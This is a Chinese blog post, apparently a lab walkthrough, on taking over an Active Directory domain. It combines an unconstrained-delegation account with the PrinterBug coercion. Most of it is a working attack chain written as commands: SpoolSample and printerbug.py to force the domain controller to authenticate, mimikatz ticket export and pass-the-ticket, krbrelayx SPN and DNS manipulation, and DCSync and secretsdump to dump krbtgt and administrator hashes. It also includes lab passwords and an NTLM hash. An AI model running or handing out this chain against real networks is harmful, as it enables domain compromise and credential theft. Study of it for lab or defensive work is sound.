非约束委派账户配合printerbug域内提权
非约束委派账户配合printerbug域内提权环境搭建配置非约束委派漏洞复现本地远程环境搭建主机机器名ip用户版本域控ad.test.com192.168.164.147administratorwin2012r2域内机器user.test.com192.168.164.129user1win2008r2配置非约束委派漏洞复现本地https://github.com/leechristensen/
环境搭建
主机 | 机器名 | ip | 用户 | 版本 |
---|---|---|---|---|
域控 | ad.test.com | 192.168.164.147 | administrator | win2012r2 |
域内机器 | user.test.com | 192.168.164.129 | user1 | win2008r2 |
配置非约束委派
漏洞复现
本地
https://github.com/leechristensen/SpoolSample/.
https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=17718
因为这里环境是win2008 默认不支持.net4.0,所以安装一个…实际环境需要参考下面的远程方法
fixed
SpoolSample.exe ad user
# 前面为域控,后面为机器
抓取票据
mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit"
可以看到在最下面已经抓到域控机器的tgt票据
导入票据
mimikatz "privilege::debug" "kerberos::ptt [0;103619]-2-0-60a10000-AD$@krbtgt-TEST.COM.kirbi" "exit"
导出hash
mimikatz "lsadump::dcsync /domain:test.com /user:krbtgt /csv" "exit"
远程
这种情况需要获得一个具有非约束委派账号(可以添加spn)并且有一个linux机器
工具地址
https://github.com/dirkjanm/krbrelayx
配置账号权限,可以添加spn
创建非约束委派账户
首先给这个用户配置spn
setspn.exe -U -A VNC/comp.test.com user1
之后配置账户非约束委派
第一种情况
有一个linux机器,但是无windows机器,这时候的密码一般是爆破或者社工来的
添加spn
python3 addspn.py -u "test.com\user1" -p "Uu1234." -s host/linux.test.com 192.168.164.147
坑点,这里要用host
添加dns记录
python3 dnstool.py -u "test.com\user1" -p Uu1234. -r linux.test.com -a add -d 192.168.164.128 192.168.164.147
#192.168.164.128为linux主机ip后面为域控ip
开启中继
python3 krbrelayx.py -p "Uu1234." -s TEST.COMuser1
触发回连
python3 printerbug.py test.com/user1@192.168.164.147 -hashes :b7f04fcd31abe483e8ec8c6eea51422d linux.test.com
利用tgt
在/etc/hosts文件中添加如下两行记录用于解析域名
192.168.164.147 ad.test.com
192.168.164.147 test.com
使用票据导出hash
export KRB5CCNAME=xxx.ccache
python3 /root/impacket/examples/secretsdump.py -k ad.test.com -just-dc-user administrator
第二种情况
有一个linux,也有windows机器,
python3 printerbug.py test.com/user1@192.168.164.147 -hashes :b7f04fcd31abe483e8ec8c6eea51422d user.test.com
#user.test.com是回连的地址
抓取票据
mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit"
剩下的票据利用就和前面一样了
参考文章
https://docs.microsoft.com/zh-cn/dotnet/api/system.func-3?view=netframework-3.5
https://mp.weixin.qq.com/s/aM2k01N6_H5FOxoEyj39LA
https://blog.csdn.net/a3320315/article/details/106511098
开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!
更多推荐
所有评论(0)